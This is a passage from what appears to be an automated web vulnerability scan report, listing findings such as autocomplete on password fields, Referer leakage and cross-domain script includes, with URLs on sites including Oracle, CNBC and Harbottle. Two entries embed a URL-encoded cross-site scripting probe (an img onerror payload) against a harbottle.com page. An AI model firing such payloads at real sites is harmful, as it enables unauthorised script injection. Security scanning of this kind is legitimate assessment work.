13.251. http://www.marykay.com/images/icn_pbp.jpg

13.252. http://www.marykay.com/images/icn_vmo.jpg

13.253. http://www.marykay.com/images/icn_yt.jpg

13.254. http://www.marykay.com/images/ielogo.jpg

13.255. http://www.marykay.com/images/searchbutton.gif

13.256. http://www.marykay.com/scripts/i2a.js

13.257. http://www.sapient.com/en-us/about-sapient/alliances.html

13.258. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

13.259. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html

13.260. http://www.sapient.com/en-us/search.html

13.261. http://www.tenzing.com/atg-ecommerce-hosting.asp

13.262. http://www2.znode.com/analytics

14. Password field with autocomplete enabled

14.1. https://bugzilla.mozilla.org/show_bug.cgi

14.2. https://bugzilla.mozilla.org/show_bug.cgi

14.3. http://digg.com/submit

14.4. https://login.cnbc.com/cas/login

14.5. https://login.cnbc.com/cas/login

14.6. https://login.cnbc.com/cas/login

14.7. https://login.cnbc.com/cas/login

14.8. https://oracleus.wingateweb.com/portal/newreg.ww

14.9. https://register.cnbc.com/createUser.do

14.10. https://register.cnbc.com/registerUser.do

14.11. https://www.atg.com/service/main.jsp

14.12. http://www.bigcommerce.com/freetrial.php

14.13. https://www.bigcommerce.com/login.php

14.14. https://www.cvs.com/CVSApp/user/login.jsp

14.15. http://www.fetchback.com/

14.16. http://www.oraclecfo.com/Authentication/Login_w.html

14.17. http://www.oraclecfo.com/Main/Home/Home_w.html

14.18. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

14.19. http://www.shopify.com/login

15. Source code disclosure

15.1. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

15.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework

15.3. http://reviews.fekkai.com/module/5113/cmn/5113redes/display.pkg.js

15.4. http://reviews.gillettevenus.com/module/4746/cmn/4746/display.pkg.js

15.5. http://search.oracle.com/search/search

15.6. http://www.cvs.com/CVSApp/js/functions.js

15.7. https://www.cvs.com/CVSApp/js/functions.js

15.8. https://www.cvs.com/CVSApp/js/userprofile.js

15.9. http://www.dove.us/Resources/JS/dove.js

15.10. http://www.netsuite.com/portal/javascript/NLPortal.js

16. ASP.NET debugging enabled

16.1. http://services.plymedia.com/Default.aspx

16.2. http://www.oraclecfo.com/Default.aspx

16.3. http://www.znode.com/Default.aspx

17. Referer-dependent response

17.1. http://a.tribalfusion.com/j.ad

17.2. http://api.bizographics.com/v1/profile.json

17.3. http://c.brightcove.com/services/viewer/federated_f9

17.4. https://login.oracle.com/mysso/signon.jsp

17.5. http://use.typekit.com/k/ghj6ovz-d.css

17.6. http://www.facebook.com/plugins/like.php

17.7. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

17.8. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php

17.9. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

17.10. http://www.youtube.com/v/JWMKXb1Guq4

18. Cross-domain POST

18.1. http://education.oracle.com/education/netcall/talk_to_us_ca.html

18.2. http://education.oracle.com/education/netcall/talk_to_us_us.html

18.3. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

18.4. http://www.sophelle.com/Contact-Us/

18.5. http://www.sophelle.com/Products/CQ/free-trial.html

19. Cross-domain Referer leakage

19.1. http://a.tribalfusion.com/j.ad

19.2. http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js

19.3. https://account.bigcommerce.com/cart.php

19.4. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38

19.5. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

19.6. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.7. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.8. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.9. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.10. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.11. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.13. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.14. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.16. http://ad.doubleclick.net/adj/nbcu.cnbc/search

19.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

19.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

19.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

19.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

19.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

19.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

19.23. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

19.24. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

19.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

19.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

19.27. http://ads.adsonar.com/adserving/getAds.jsp

19.28. http://ads.pointroll.com/PortalServe/

19.29. http://afe.specificclick.net/serve/v=5

19.30. http://afe.specificclick.net/serve/v=5

19.31. http://afe.specificclick.net/serve/v=5

19.32. http://blog.harbottle.com/dm/

19.33. http://blog.harbottle.com/dm/index.php

19.34. http://clickserve.dartsearch.net/link/click

19.35. http://d7.zedo.com/jsc/d3/fl.js

19.36. http://d7.zedo.com/jsc/d3/fl.js

19.37. http://d7.zedo.com/jsc/d3/fl.js

19.38. http://d7.zedo.com/jsc/d3/fl.js

19.39. http://d7.zedo.com/jsc/d3/fl.js

19.40. http://d7.zedo.com/jsc/d3/fl.js

19.41. http://d7.zedo.com/jsc/d3/fl.js

19.42. http://d7.zedo.com/jsc/d3/fl.js

19.43. http://d7.zedo.com/jsc/d3/fl.js

19.44. http://d7.zedo.com/jsc/d3/fl.js

19.45. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js

19.46. http://data.cnbc.com/quotes/CN

19.47. http://data.cnbc.com/quotes/CN

19.48. http://data.cnbc.com/quotes/HK

19.49. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

19.50. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main

19.51. http://fls.doubleclick.net/activityi

19.52. http://fls.doubleclick.net/activityi

19.53. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/

19.54. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

19.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

19.56. http://optimized-by.rubiconproject.com/a/dk.html

19.57. https://oracleus.wingateweb.com/portal/newreg.ww

19.58. http://readwriteenterprise.disqus.com/combination_widget.js

19.59. http://search.cnbc.com/main.do

19.60. http://search.oracle.com/search/search

19.61. http://serve.directdigitalllc.com/serve.php

19.62. http://serve.directdigitalllc.com/serve.php

19.63. http://serve.directdigitalllc.com/serve.php

19.64. http://serve.directdigitalllc.com/serve.php

19.65. http://serve.directdigitalllc.com/serve.php

19.66. http://serve.directdigitalllc.com/serve.php

19.67. http://serve.directdigitalllc.com/serve.php

19.68. http://serve.directdigitalllc.com/serve.php

19.69. http://serve.directdigitalllc.com/serve.php

19.70. http://serve.directdigitalllc.com/serve.php

19.71. http://sophelle.web5.hubspot.com/Default.aspx

19.72. http://sophelle.web5.hubspot.com/Default.aspx

19.73. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js

19.74. http://ticker.cnbc.com/scripts/cnbc_ticker.js

19.75. http://www.atg.com/service/main.jsp

19.76. https://www.atg.com/en/password/request/

19.77. https://www.atg.com/service/main.jsp

19.78. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

19.79. http://www.cnbc.com/js/cnbc_quote_components.js

19.80. http://www.covergirl.com/__utm.gif

19.81. http://www.covergirl.com/beauty-products

19.82. http://www.csc.com/search

19.83. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp

19.84. http://www.cvs.com/CVSApp/search/search.jsp

19.85. http://www.deloitte.com/view/en_US/us/search/index.htm

19.86. http://www.deloitte.com/view/en_US/us/search/index.htm

19.87. http://www.deloitte.com/view/en_US/us/search/index.htm

19.88. http://www.deloitte.com/view/en_US/us/search/index.htm

19.89. http://www.dove.us/Products/Hair/

19.90. http://www.facebook.com/plugins/activity.php

19.91. http://www.facebook.com/plugins/activity.php

19.92. http://www.fekkai.com/

19.93. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

19.94. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

19.95. http://www.gillettevenus.com/en_US/search/index.jsp

19.96. http://www.gillettevenus.com/global/blank.html

19.97. http://www.google.com/search

19.98. http://www.google.com/search

19.99. http://www.google.com/search

19.100. http://www.google.com/search

19.101. http://www.googleadservices.com/pagead/conversion/1071435827/

19.102. http://www.harbottle.com/hnl/pages/hnl.php

19.103. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

19.104. http://www.marykay.com/default.aspx

19.105. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html

19.106. http://www.oracle.com/openworld/register/packages/index.html

19.107. http://www.oracle.com/technetwork/index.html

19.108. http://www.oracle.com/us/ciocentral/index.html

19.109. http://www.oracle.com/us/go/index.html

19.110. http://www.oraclecfo.com/Authentication/Login_w.html

19.111. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

19.112. http://www.rayalab.com/

19.113. http://www.resourcepoint.net/

19.114. http://www.sapient.com/en-us/search.html

19.115. http://www.shopify.com/

19.116. http://www.tenzing.com/atg-ecommerce-hosting.asp

19.117. http://www.volusion.com/

19.118. http://www.youtube.com/embed/kPJh9FWuOks

19.119. http://www.znode.com/znode-multifront/default.aspx

20. Cross-domain script include

20.1. https://account.bigcommerce.com/cart.php

20.2. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

20.3. http://afe.specificclick.net/serve/v=5

20.4. http://afe.specificclick.net/serve/v=5

20.5. http://afe.specificclick.net/serve/v=5

20.6. http://blog.harbottle.com/dm/

20.7. http://blog.harbottle.com/dm/index.php

20.8. http://blog.ulf-wendel.de/

20.9. http://blogs.oracle.com/otn/resource/html/tweet2.html

20.10. http://cdn5.tribalfusion.com/media/1956006/frame.html

20.11. http://cdn5.tribalfusion.com/media/2516896//frm.html

20.12. https://cms.paypal.com/us/cgi-bin/

20.13. http://data.cnbc.com/quotes

20.14. http://data.cnbc.com/quotes/

20.15. http://data.cnbc.com/quotes/.DJIA

20.16. http://data.cnbc.com/quotes/.DJIA

20.17. http://data.cnbc.com/quotes/.DJIA/tab/1

20.18. http://data.cnbc.com/quotes/.DJIA/tab/2

20.19. http://data.cnbc.com/quotes/.FCHI

20.20. http://data.cnbc.com/quotes/.FCHI/tab/2

20.21. http://data.cnbc.com/quotes/.FTSE

20.22. http://data.cnbc.com/quotes/.FTSE/tab/2

20.23. http://data.cnbc.com/quotes/.GDAXI

20.24. http://data.cnbc.com/quotes/.GDAXI/tab/2

20.25. http://data.cnbc.com/quotes/.N225

20.26. http://data.cnbc.com/quotes/.N225/tab/2

20.27. http://data.cnbc.com/quotes/.SPX

20.28. http://data.cnbc.com/quotes/.SPX/tab/2

20.29. http://data.cnbc.com/quotes/CN

20.30. http://data.cnbc.com/quotes/CN

20.31. http://data.cnbc.com/quotes/COMP

20.32. http://data.cnbc.com/quotes/COMP/tab/2

20.33. http://data.cnbc.com/quotes/HK

20.34. https://deloitte.zettaneer.com/Subscriptions/

20.35. http://digg.com/submit

20.36. http://ecommerce-templates.volusion.com/

20.37. http://edge.sapient.com/assets/scripts/global.js

20.38. http://fls.doubleclick.net/activityi

20.39. https://login.cnbc.com/cas/login

20.40. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

20.41. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.42. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.43. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.44. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.45. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.46. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.47. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.48. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

20.51. https://register.cnbc.com/email/EmailSupport.jsp

20.52. https://register.cnbc.com/forgotPassword.do

20.53. https://register.cnbc.com/forgotPassword1.do

20.54. http://search.cnbc.com/main.do

20.55. http://support.bigcommerce.com/

20.56. https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F

20.57. http://thinkwrap.com/contact/

20.58. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/

20.59. http://thinkwrap.com/ourfocus/location-services/

20.60. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-nav-men.png

20.61. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-su-menu.gif

20.62. http://www.atg.com/

20.63. http://www.atg.com/en/solutions/

20.64. http://www.atg.com/service/main.jsp

20.65. https://www.atg.com/en/customers/listing/

20.66. https://www.atg.com/en/password/request/

20.67. https://www.atg.com/en/register/

20.68. https://www.atg.com/service/main.jsp

20.69. http://www.beautyproductsdirect.com/

20.70. http://www.beautyproductsdirect.com/lashes.html

20.71. http://www.bigcommerce.com/

20.72. http://www.bigcommerce.com/in-the-news.php

20.73. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

20.74. http://www.bigcommerce.com/plans.php

20.75. https://www.bigcommerce.com/buzz.php

20.76. https://www.bigcommerce.com/careers.php

20.77. https://www.bigcommerce.com/compatible-with.php

20.78. https://www.bigcommerce.com/login.php

20.79. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php

20.80. http://www.cnbc.com/

20.81. http://www.cnbc.com/id/15837856

20.82. http://www.cnbc.com/id/15837856/site/14081545/

20.83. http://www.cnbc.com/id/15838394

20.84. http://www.cnbc.com/id/15839263/

20.85. http://www.cnbc.com/pointrollads.htm

20.86. http://www.covergirl.com/__utm.gif

20.87. http://www.covergirl.com/beauty-products

20.88. http://www.covergirl.com/favicon.ico

20.89. http://www.covergirl.com/search/results=makeup%20eyelash

20.90. http://www.covergirl.com/search/results=xss%20help%20phone%20cable

20.91. http://www.csc.com/application_services/contact_us

20.92. http://www.csc.com/contact_us

20.93. http://www.csc.com/credit_services/contact_us/

20.94. http://www.csc.com/cybersecurity/contact_us

20.95. http://www.deloitte.com/view/en_US/us/Contact-us/email-us/index.htm

20.96. http://www.deloitte.com/view/en_US/us/Contact-us/index.htm

20.97. http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm

20.98. http://www.deloitte.com/view/en_US/us/Industries/index.htm

20.99. http://www.deloitte.com/view/en_US/us/Insights/index.htm

20.100. http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm

20.101. http://www.deloitte.com/view/en_US/us/index.htm

20.102. http://www.deloitte.com/view/en_US/us/search/index.htm

20.103. http://www.dove.us/Products/Hair/

20.104. http://www.facebook.com/plugins/activity.php

20.105. http://www.fekkai.com/

20.106. http://www.fekkai.com/categories/conditioners/

20.107. http://www.fekkai.com/favicon.ico

20.108. http://www.fekkai.com/images/world_of_fekkai_box.jpg

20.109. http://www.fekkai.com/style/

20.110. http://www.fekkai.com/style/inspiration/

20.111. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

20.112. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

20.113. http://www.gillettevenus.com/en_US/images/go_roll.png

20.114. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp

20.115. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

20.116. http://www.gillettevenus.com/en_US/razor_finder/index.jsp

20.117. http://www.gillettevenus.com/en_US/search/index.jsp

20.118. http://www.gillettevenus.com/global/blank.html

20.119. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

20.120. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php

20.121. http://www.harbottle.com/hnl/pages/hnl.php

20.122. http://www.harbottle.com/hnl/pages/hnl_search2.php

20.123. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

20.124. http://www.harbottle.com/hnl/pages/hnl_search2.php/a

20.125. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

20.126. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

20.127. http://www.harbottle.com/hnl/pages/pubs/479

20.128. http://www.harbottle.com/hnl/pix/newsletters/50th_logo.jpg

20.129. http://www.harbottle.com/hnl/pix/newsletters/ESportsMasthead.jpg

20.130. http://www.harbottle.com/hnl/pix/newsletters/gronholm_NSLTR.jpg

20.131. http://www.harbottle.com/hnl/pix/newsletters/rugby3.jpg

20.132. http://www.harbottle.com/hnl/pix/newsletters/sjones.jpg

20.133. http://www.harbottle.com/hnl/pix/square.gif

20.134. http://www.harbottle.com/hnl/pix/square_FF9933.gif

20.135. http://www.netsuite.com/portal/home.shtml

20.136. http://www.netsuite.com/portal/products/netsuite/financials/main.shtml

20.137. http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml

20.138. http://www.oracle.com/ao/index.html

20.139. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

20.140. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

20.141. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

20.142. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

20.143. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

20.144. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

20.145. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

20.146. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

20.147. http://www.oracle.com/index.html

20.148. http://www.oracle.com/openworld/connect/face-to-face/welcome-reception/index.html

20.149. http://www.oracle.com/openworld/connect/index.html

20.150. http://www.oracle.com/openworld/contact/index.html

20.151. http://www.oracle.com/openworld/index.html

20.152. http://www.oracle.com/openworld/learn/index.html

20.153. http://www.oracle.com/openworld/learn/other/general-sessions/index.html

20.154. http://www.oracle.com/openworld/learn/other/oracle-university/index.html

20.155. http://www.oracle.com/openworld/register/packages/index.html

20.156. http://www.oracle.com/openworld/tools/index.html

20.157. http://www.oracle.com/openworld/tools/mobile/index.html

20.158. http://www.oracle.com/partners/admin/web_account.html

20.159. http://www.oracle.com/partners/en/how-to-do-business/index.html

20.160. http://www.oracle.com/partners/en/join-now/index.html

20.161. http://www.oracle.com/partners/en/knowledge-zone/index.html

20.162. http://www.oracle.com/partners/en/most-popular-resources/enablement-028916.htm

20.163. http://www.oracle.com/partners/en/opn-program/index.html

20.164. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

20.165. http://www.oracle.com/partners/en/opn-program/membership-resources/index.html

20.166. http://www.oracle.com/partners/en/opn-program/opn-details-by-levels/index.html

20.167. http://www.oracle.com/partners/en/opn-program/specialize/index.html

20.168. http://www.oracle.com/partners/index.html

20.169. http://www.oracle.com/partners/secure/development/index.html

20.170. http://www.oracle.com/partners/secure/development/order-technology-software/access-software-and-support-020672.htm

20.171. http://www.oracle.com/partners/secure/development/order-technology-software/index.html

20.172. http://www.oracle.com/partners/secure/marketing/download-logos/index.html

20.173. http://www.oracle.com/partners/secure/marketing/index.html

20.174. http://www.oracle.com/partners/secure/marketing/marketing-and-event-kits/index.html

20.175. http://www.oracle.com/partners/secure/membership/index.html

20.176. http://www.oracle.com/partners/secure/news/index.html

20.177. http://www.oracle.com/partners/secure/news/worldwide-opn-newsletter/index.html

20.178. http://www.oracle.com/partners/secure/sales/index.html

20.179. http://www.oracle.com/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm

20.180. http://www.oracle.com/partners/secure/sales/pricing-licensing/index.html

20.181. http://www.oracle.com/partners/secure/sales/resell-support/index.html

20.182. http://www.oracle.com/partners/secure/sales/sales-kits/index.html

20.183. http://www.oracle.com/partners/secure/support/index.html

20.184. http://www.oracle.com/technetwork/apps-tech/index-095827.html

20.185. http://www.oracle.com/technetwork/apps-tech/index-097651.html

20.186. http://www.oracle.com/technetwork/apps-tech/index.html

20.187. http://www.oracle.com/technetwork/architect/index.html

20.188. http://www.oracle.com/technetwork/articles/index.html

20.189. http://www.oracle.com/technetwork/community/developer-vm/index.html

20.190. http://www.oracle.com/technetwork/community/join/overview/index.html

20.191. http://www.oracle.com/technetwork/community/oracle-ace/index.html

20.192. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html

20.193. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html

20.194. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

20.195. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html

20.196. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html

20.197. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

20.198. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

20.199. http://www.oracle.com/technetwork/dbadev/index.html

20.200. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

20.201. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html

20.202. http://www.oracle.com/technetwork/developer-tools/index.html

20.203. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

20.204. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html

20.205. http://www.oracle.com/technetwork/index.html

20.206. http://www.oracle.com/technetwork/indexes/documentation/index.html

20.207. http://www.oracle.com/technetwork/indexes/downloads/index.html

20.208. http://www.oracle.com/technetwork/indexes/products/index.html

20.209. http://www.oracle.com/technetwork/java/index.html

20.210. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html

20.211. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html

20.212. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html

20.213. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html

20.214. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

20.215. http://www.oracle.com/technetwork/oem/downloads/index-084446.html

20.216. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html

20.217. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

20.218. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html

20.219. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

20.220. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html

20.221. http://www.oracle.com/technetwork/systems/index.html

20.222. http://www.oracle.com/technetwork/topics/cloud/index.html

20.223. http://www.oracle.com/technetwork/topics/index.html

20.224. http://www.oracle.com/technetwork/topics/newtojava/index.html

20.225. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html

20.226. http://www.oracle.com/technetwork/topics/security/index.html

20.227. http://www.oracle.com/technetwork/topics/soa/index.html

20.228. http://www.oracle.com/technetwork/topics/virtualization/index.html

20.229. http://www.oracle.com/us/ciocentral/index.html

20.230. http://www.oracle.com/us/community/index.html

20.231. http://www.oracle.com/us/corporate/Acquisitions/index.html

20.232. http://www.oracle.com/us/corporate/analystrelations/index.html

20.233. http://www.oracle.com/us/corporate/blogs/index.html

20.234. http://www.oracle.com/us/corporate/careers/index.html

20.235. http://www.oracle.com/us/corporate/citizenship/community/038108.htm

20.236. http://www.oracle.com/us/corporate/citizenship/index.html

20.237. http://www.oracle.com/us/corporate/customers/index.html

20.238. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

20.239. http://www.oracle.com/us/corporate/features/engineered-173370.html

20.240. http://www.oracle.com/us/corporate/history/index.html

20.241. http://www.oracle.com/us/corporate/index.html

20.242. http://www.oracle.com/us/corporate/innovation/index.html

20.243. http://www.oracle.com/us/corporate/insight/index.html

20.244. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html

20.245. http://www.oracle.com/us/corporate/investor-relations/index.html

20.246. http://www.oracle.com/us/corporate/oracle-racing-070515.html

20.247. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

20.248. http://www.oracle.com/us/corporate/press/Executives/index.html

20.249. http://www.oracle.com/us/corporate/press/index.html

20.250. http://www.oracle.com/us/corporate/pricing/index.html

20.251. http://www.oracle.com/us/corporate/pricing/price-lists/index.html

20.252. http://www.oracle.com/us/corporate/profit/index.html

20.253. http://www.oracle.com/us/corporate/publishing/index.html

20.254. http://www.oracle.com/us/corporate/timeline/index.html

20.255. http://www.oracle.com/us/go/index.html

20.256. http://www.oracle.com/us/index.html

20.257. http://www.oracle.com/us/industries/communications/index.html

20.258. http://www.oracle.com/us/industries/education-and-research/018753.htm

20.259. http://www.oracle.com/us/industries/engineering-and-construction/index.html

20.260. http://www.oracle.com/us/industries/financial-services/index.html

20.261. http://www.oracle.com/us/industries/index.html

20.262. http://www.oracle.com/us/industries/retail/index.html

20.263. http://www.oracle.com/us/partnerships/solutions/index.html

20.264. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html

20.265. http://www.oracle.com/us/products/applications/fusion/index.html

20.266. http://www.oracle.com/us/products/applications/index.html

20.267. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html

20.268. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html

20.269. http://www.oracle.com/us/products/applications/primavera/index.html

20.270. http://www.oracle.com/us/products/consulting/index.html

20.271. http://www.oracle.com/us/products/database/index.html

20.272. http://www.oracle.com/us/products/enterprise-manager/index.html

20.273. http://www.oracle.com/us/products/financing/index.html

20.274. http://www.oracle.com/us/products/index.html

20.275. http://www.oracle.com/us/products/middleware/exalogic/index.html

20.276. http://www.oracle.com/us/products/middleware/index.html

20.277. http://www.oracle.com/us/products/ondemand/index.html

20.278. http://www.oracle.com/us/products/productslist/index.html

20.279. http://www.oracle.com/us/products/servers-storage/index.html

20.280. http://www.oracle.com/us/products/servers-storage/solaris/index.html

20.281. http://www.oracle.com/us/products/tools/index.html

20.282. http://www.oracle.com/us/social-media/facebook/index.html

20.283. http://www.oracle.com/us/social-media/linkedin/index.html

20.284. http://www.oracle.com/us/social-media/twitter/index.html

20.285. http://www.oracle.com/us/solutions/corporate-governance/index.html

20.286. http://www.oracle.com/us/solutions/datawarehousing/index.html

20.287. http://www.oracle.com/us/solutions/ent-performance-bi/index.html

20.288. http://www.oracle.com/us/solutions/midsize/index.html

